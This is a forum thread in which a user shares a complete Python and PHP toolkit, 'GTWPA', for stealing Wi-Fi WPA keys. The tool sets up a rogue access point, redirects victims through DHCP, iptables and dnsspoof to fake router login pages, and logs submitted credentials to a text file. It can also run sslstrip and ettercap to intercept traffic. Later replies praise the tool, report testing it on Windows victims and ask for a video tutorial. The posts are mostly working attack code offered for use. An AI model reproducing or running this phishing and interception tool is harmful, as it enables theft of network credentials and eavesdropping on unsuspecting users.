Results 1 to 8 of 8

Thread: WPA Stealer & All-in-One

  1. #1
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default WPA Stealer & All-in-One

    Hello All,


    I'm quite a noob' actually but i'd like to share the work i make for the GTWPA project on crack-wifi (French forum about wifi).

    -- So, here is the idea :

    - Create a false AP
    - Force the client/victim to connect on
    - Run an http server to redirect all his request on a fake Page
    - Invite him to enter his WPA key
    - Write it in a .txt file
    - PwNeD

    --

    Before anything, i want to say that i'm really a noob' so my code will not be good but it's working on BT4 R1. If anyone have interesting things to say, do not hesitate, it will be great for my knowledge.

    --

    To make the script workable, you need to have kind of a Fake Page, you can find french's fake page on crack-wifi.com.


    Here is the script :

    Code:
    #!/usr/bin/env python
    # -*- coding: Utf-8 -*-
    
    # VERSION & AUTEUR
    __app__ = 'GTWPA'
    __verions__ = '1.0'
    __author__ = 'Carto_'
    
    from Tkinter import *
    from fonctions.py import *
    
    menu()
    while SECTION != 8:
    	
    	
    	# Install
    	if SECTION == 1:
        		screen_clear()
        		print " -- INSTALLATION GTWPA -- "
        		installation()
        		sleep(2)
        		screen_clear()
        		menu()
    
    	# Launch apache2
    	elif SECTION == 2:
        		screen_clear()
        		print "-- Launching Apache2 server --"
        		sleep(2)
        		os.system("service apache2 start")
        		sleep(2)
        		screen_clear()
        		menu()
    
    	# Verification of the fake page
    	elif SECTION == 3:
        		screen_clear()
        		print "-- VERIFICATION OF THE FAKE PAGE --"
        		sleep(2)
        		os.system("firefox 127.1.1.0")
        		print "-- All is ok ? So, let's go ! --"
        		sleep(2)
        		screen_clear()
        		menu()
        
    	# Configuring the rogue AP
    	elif SECTION == 4:
        		screen_clear()
    		print "-- CONFIGURATION OF THE ROGUE AP --"
        		recup_config()
        		dhcpd_creator()
        		sleep(2)
        		screen_clear()
        		menu()
    	elif SECTION == 5:
    		screen_clear()
        		print "-- Launching the Rogue AP --"
        		rogue_ap_launch()
        		dhcp_launch_rogue()
        		dnsspoof_launch()
        		sleep(2)
        		screen_clear()
    		menu()
    	# Soft AP sslstriped
    	elif SECTION == 6:
    	    print "-- Launching of the SOFT AP Ssltriped"
    	    os.system("killall -9 dhcpd tcpdump airbase-ng")
    	    rogue_ap_launch()
    	    dhcp_launch_soft()
    	    os.system("xterm -hold -e sslstrip -a -k -f &> /dev/null &")
    	    sleep(2)
    	    os.system("xterm -hold -e ettercap -T -q -p -i at0 &> /dev/null &")
    	    sleep(2)
    	    print "Soft AP Launched, waiting clients to connect" 
    	    sleep(2)
    	    screen_clear()
    	    menu()
    	else :
    		screen_clear()
    		print "BAD CHOICE"
    		menu()
    
    
    # END
    
    screen_clear()
    print "-- Thx, do not hesitate to report bugs ! --"
    remise_zero()
    sleep(2)
    screen_clear()
    sysexit()



    So, to run the script you need to put in /root/GTWPA :

    - numericable.tar.gz, freebox.tar.gz
    * With an index file
    * A valid.php file (code here)

    Code:
    <?php
    $pass = $_POST['password'];
    $usr = $_POST['username'];
    
    $fp = fopen("keywpa.txt","a"); 
    fputs($fp, "$usr");
    fputs($fp, "\n"); 
    fputs($fp, "$pass");
    fclose($fp);
    ?>
    * A .htaccess file : ErrorDocument 404 http://192.168.1.129/index.html

    And that's all !

  2. #2
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re: WPA Stealer & All-in-One

    And here is the fonctions.py :

    Code:
    #### FONCTIONS FOR GTWPA-1.0 ####
    
    #!/usr/bin/env python
    # -*- coding: Utf-8 -*-
    
    # Import cmd (OS: BT4 R1)
    
    import os
    from sys import exit as sysexit
    from commands import getoutput
    from threading import Thread
    from time import sleep
    from os import chdir
    chdir("/root/GTWPA") # where we find the script and files used by
    
    
    
    
    def installation():
        os.system("mkdir /root/GTWPA")
        print "INSTALL IN PROGRESS ... ... ..."
        global boxe_choisie
        print "What kind of box ?"
        print "1. NumŽricable"
        print "2. Freebox"
        print "3. Livebox"
        print "4. SFR-Neufbox"
        print "5. Tele2box SpeedTouch"
        print "6. Neufbox Originale"
        box_choisie = input()
        if box_choisie == 1:
    	print "NumŽricable"
    	os.system("cp /root/GTWPA/numericable.tar.gz /var/www")
    	chdir("/var/www/")
    	os.system("tar -xvzf numericable.tar.gz")
    	os.system("chmod -R 777 /var/www")
    	os.system("cd /root/GTWPA/")
    	print "INSTALL FINISH"
    	chdir("/root/GTWPA")
    	
        elif box_choisie == 2:
    	print "Freebox"
    	os.system("cp /root/GTWPA/freebox.tar.gz /var/www")
    	chdir("/var/www/")
    	os.system("tar -xvzf freebox.tar.gz")
    	os.system("chmod -R 777 /var/www")
    	os.system("cd /root/GTWPA/")
    	print "INSTALL FINISH"
    	chdir("/root/GTWPA")
        elif box_choisie == 3:
    	print "Livebox"
    	os.system("cp /root/GTWPA/livebox.tar.gz /var/www")
    	chdir("/var/www/")
    	os.system("tar -xvzf livebox.tar.gz")
    	os.system("chmod -R 777 /var/www")
    	os.system("cd /root/GTWPA/")
    	print "INSTALL FINISH"
    	chdir("/root/GTWPA")
        elif box_choisie == 4:
    	print "SFR-Neufbox"
    	os.system("cp /root/GTWPA/neufboxsfr.tar.gz /var/www")
    	chdir("/var/www/")
    	os.system("tar -xvzf neufboxsft.tar.gz")
    	os.system("chmod -R 777 /var/www")
    	os.system("cd /root/GTWPA/")
    	print "INSTALL FINISH"
    	chdir("/root/GTWPA")
        elif box_choisie == 5:
    	print "Tele2box SpeedTouch"
    	os.system("cp /root/GTWPA/tele2box.tar.gz /var/www")
    	chdir("/var/www/")
    	os.system("tar -xvzf tele2box.tar.gz")
    	os.system("chmod -R 777 /var/www")
    	os.system("cd /root/GTWPA/")
    	print "INSTALL FINISH"
    	chdir("/root/GTWPA")
        elif box_choisie == 6:
    	print "NeufBox Originale"
    	os.system("cp /root/GTWPA/neufbox.tar.gz /var/www")
    	chdir("/var/www/")
    	os.system("tar -xvzf neufbox.tar.gz")
    	os.system("chmod -R 777 /var/www")
    	os.system("cd /root/GTWPA/")
    	print "INSTALL FINISH"
    	chdir("/root/GTWPA")
        else :
    	print "BAD ENTRY"
    	box_choisie = input()
    
    
    
    
    
    
    def airBase(BSSID, ESSID, CHANNEL, IFACE):
        os.system("modprobe tun 2>&1 1>& /dev/null")
        os.system("xterm -e airbase-ng -a %s -e '%s' -c %s %s &>/dev/null &" % (BSSID, ESSID, CHANNEL, IFACE))
        sleep(2)
    
    
    
    
    def checkRoot():
        if getoutput('whoami') != 'root':
            print("You have to be root!")
            sysexit()
    
    
    
    def screen_clear():
        os.system("clear")
        print("\n\t\t\t[GTWPA]")
    
    
    
    def dhcpd_creator ():
        DHCPDCONF="""
        ## Configuration auto-gŽnŽrŽe par le programme WPA_GRABBER
        ddns-update-style ad-hoc;
        default-lease-time 600;
        max-lease-time 7200;
        authoritative;
        subnet 192.168.1.128 netmask 255.255.255.128 {
        	option subnet-mask 255.255.255.128;
            option broadcast-address 192.168.1.255;
            option routers 192.168.1.129;
            option domain-name-servers 208.67.222.222;
            range 192.168.1.130 192.168.1.140;
        }
        ## End of SoftAP auto-generated config
        """
        # Writting dhcpd.conf
        chdir("/root/GTWPA/")
        configfile = open('dhcpd.conf', 'w')
        configfile.write(DHCPDCONF)
        configfile.close()
    
    def recup_config ():
        "Fonction de rŽcupŽration des paramtres pour la Rogue"
        global IFACE
        global CHANNEL
        global ESSID
        global BSSID
        IFACE = raw_input("\n-- Interface used for the rogue ?\n>>> ")
        # If exist
        while IFACE not in getoutput('iwconfig'):
            print("Interface %s not find\n" % IFACE)
            IFACE = raw_input("\n-- Interface used for the rogue ?\n>>> ")
       
        # Le BSSID de la Rogue_AP
        BSSID = raw_input("\nBSSID ? (leave blank if you don't want any change)\n>>> ")
        while (len(BSSID) != 17) and (BSSID.count(':') != 5):
            if BSSID == '':
                BSSID = getoutput('macchanger -s '+IFACE+" | awk '{print $3}'")
                break
            print("BSSID %s not valid, please try again" % BSSID)
            BSSID = raw_input("\nBSSID ?(leave blank if you don't want to change)\n>>> ")
    
        # L'ESSID de la Rogue_AP
        ESSID = raw_input("\ ESSID ?\n>>> ")
        while ESSID == '':
            print("L'ESSID is needed")
            ESSID = raw_input("ESSID ?\n>>> ")
    
        #  Channel 
        CHANNEL = raw_input("\nCHANNEL ? \n>>> ")
        while not CHANNEL.isdigit() and not (0 < int(CHANNEL) < 14):
            print("Channel %s is not a valid channel, please try again (1-15)")
            CHANNEL = raw_input("CHANNEL ?\n>>> ")
    
    
    
    
    def rogue_ap_launch():
        global BSSID
        global ESSID
        global CHANNEL
        global IFACE
        print("\n\n LAUNCHING AIRBASE-NG")
        airBase(BSSID, ESSID, CHANNEL, IFACE)
        sleep(3)
        os.system('modprobe tun && \
                   ifconfig at0 up && \
                   ifconfig at0 192.168.1.129 netmask 255.255.255.128 && \
                   ifconfig at0 mtu 1500 && \
                   route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129')
        sleep(2)
    
    
    
    def dhcp_launch_rogue():
        print("\n LAUNCHING DHCP SERVER")
        os.system("xterm -hold -e dhcpd3 -d -f -cf /root/GTWPA/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &")
        os.system("iptables --flush")
        print "1"
        os.system("iptables --table nat --flush")
        print "2"
        os.system("iptables --delete-chain")
        print "3"
        os.system("iptables --append FORWARD --in-interface at0 -j ACCEPT")
        print "4"
        os.system("iptables -t nat -A PREROUTING -p udp -j DNAT --to 208.67.222.222")
        print "5"
        os.system("iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 192.168.1.129:80")
        print "6"
        os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
        print "7"
    
    
    
    def dhcp_launch_soft():
        "DHCP FOR SOFT AP"
        print("\n LAUNCHING DHCP")
        os.system("xterm -hold -e dhcpd3 -d -f -cf /root/GTWPA/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &> /dev/null &")
        os.system("iptables --flush")
        print "1"
        os.system("iptables --table nat --flush")
        print "2"
        os.system("iptables --delete-chain")
        print "3"
        os.system("iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE")
        print "4"
        os.system("iptables --append FORWARD --in-interface at0 -j ACCEPT")
        print "5"
        os.system("iptables -t nat -A PREROUTING -p udp -j DNAT --to 208.67.222.222")
        print "6"
        os.system("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000")
        os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
        print "7"
    
    
    def dnsspoof_launch():
        print " LAUNCHING DNSSPOOF"
        os.system("xterm -hold -e dnsspoof -i at0 -f /root/GTWPA/dns.txt &> /dev/null &")
        DNSSPOOF="""
    192.168.1.129 *
    """
        chdir("/root/GTWPA/")
        configfile = open('dns.txt', 'w')
        configfile.write(DNSSPOOF)
        configfile.close()
    
    
    
    
    def remise_zero():
        print(" LEAVING AND RESTORE ")
        dhcp_pid = getoutput("ps aux | grep -v grep | grep 'dhcpd -cf dhcpd.conf' | awk '{print $2}'")
        airbase_pid = getoutput("ps aux | grep -v grep | grep airbase-ng | awk '{print $2}'")
        os.system('kill -9 %s && killall airbase-ng && \
                   iptables -t nat -F && iptables -t nat -X && iptables -t nat -Z && \
                   iptables-restore < iptables.rules && \
                   echo 0 > /proc/sys/net/ipv4/ip_forward' % dhcp_pid)
        os.remove(os.getcwd()+'/dhcpd.conf')
        os.remove(os.getcwd()+'/iptables.rules')
        print("\n === thx, do not hesitate to report bugs\n")
        sysexit()
    
    
    
    def menu():
    	print " --- *** SCRIPT CODED BY CARTO_ *** ---"
    	print "1. INSTALL GTWPA"
    	print "2. Launch the web server"
    	print "3. Verification of the Fake Page"
    	print "4. Configure the Rogue"
    	print "5. Launch Rogue"
    	print "6. SOFT AP Sslstriped"
    	print "7. Option deauth client (COME SOON)"
    	print "8. LEAVE AND RESTORE"
    	print "Your Choice ?"
    	global SECTION
    	SECTION = input()
    
    
    ###  END FONCTIONS ###

  3. #3
    Junior Member
    Join Date
    Aug 2010
    Posts
    64

    Default Re: WPA Stealer & All-in-One

    I like what I see here, I'd like to incorporate some of this in my script... My Blog

  4. #4
    Member
    Join Date
    Feb 2010
    Posts
    50

    Default Re: WPA Stealer & All-in-One

    can you make it on video/

  5. #5
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re : WPA Stealer & All-in-One

    Yes i'will make a tutorial on video soon where i explain how to make it workable. In something like 2 or 3 days i'll post it here

  6. #6
    Junior Member Liuser's Avatar
    Join Date
    Apr 2010
    Posts
    58

    Default Re: Re : WPA Stealer & All-in-One

    Just tested this Rogue AP script.

    I had to make a few changes to the script since the Python interpreter complained. I'm not sure if there is a discrepancy in versions between BT4 (which I still am on) and BT4R1's Python version and settings to throw those errors.

    Anyhoo - besides the initial easy to fix errors, the script works great and is easily modifiable and readable. I made some changes primarily adding variables to the top of the script so I can change the installation directories and configuration directories much more easily (default /root/GTWPA in your script). A major complaint I have is that it appears you have some packages to install on Option 1 to load the custom phishing login pages where you extract a bunch of *.tar.gz files. Afterwards you issue a recursive chmod 777 in /var/www. I wouldn't necessarily want to perform this command for obvious security reasons.

    Thanks and good work.

    Edit: I am not sure why, but I could not get the attack to work against OSX machines. It appears that DHCP fails to issue an IP to OSX for whatever reason (digging into it more). Windows machines work fine.
    Last edited by Liuser; 11-04-2010 at 04:17 AM.

  7. #7
    Junior Member
    Join Date
    Jan 2010
    Posts
    31

    Default Re : WPA Stealer & All-in-One

    I've got the same problem with MacOSX users. I don't know why but they can't obtain a valid IP ... If someone have an idea ...

  8. #8
    Junior Member wh1t3fang's Avatar
    Join Date
    Nov 2010
    Location
    from the internet
    Posts
    75

    Default Re: WPA Stealer & All-in-One

    Nice rogue hotspot script.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •